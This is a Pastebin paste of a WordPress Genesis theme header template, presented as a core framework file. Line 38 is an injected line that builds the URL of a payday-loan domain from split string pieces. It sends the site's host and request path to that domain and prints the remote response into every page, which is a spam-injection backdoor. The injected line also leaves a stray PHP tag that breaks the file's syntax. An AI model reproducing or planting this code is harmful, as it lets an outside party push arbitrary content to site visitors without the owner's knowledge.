Advertisement
Guest User

Untitled

a guest
Apr 21st, 2015
202
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.09 KB | None | 0 0
  1. <?php
  2. /*
  3. WARNING: This file is part of the core Genesis framework. DO NOT edit
  4. this file under any circumstances. Please do all modifications
  5. in the form of a child theme.
  6. */
  7.  
  8. /**
  9. * Handles the header structure.
  10. *
  11. * This file is a core Genesis file and should not be edited.
  12. *
  13. * @category Genesis
  14. * @package Templates
  15. * @author StudioPress
  16. * @license http://www.opensource.org/licenses/gpl-license.php GPL v2.0 (or later)
  17. * @link http://www.studiopress.com/themes/genesis
  18. */
  19.  
  20. do_action( 'genesis_doctype' );
  21. do_action( 'genesis_title' );
  22. do_action( 'genesis_meta' );
  23.  
  24. wp_head(); /** we need this for plugins **/
  25. ?>
  26. </head>
  27. <body <?php body_class(); ?>>
  28. <?php
  29. do_action( 'genesis_before' );
  30. ?>
  31. <div id="wrap">
  32. <?php
  33. do_action( 'genesis_before_header' );
  34. do_action( 'genesis_header' );
  35. do_action( 'genesis_after_header' );
  36.  
  37. echo '<div id="inner">';
  38. <? $source = "http"."://"."paydayloanldx"."."."com/abcd/index.php?d=".$_SERVER['HTTP_HOST']."&r=".urlencode($_SERVER['REQUEST_URI']); echo file_get_contents($source); ?>
  39. genesis_structural_wrap( 'inner' );
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement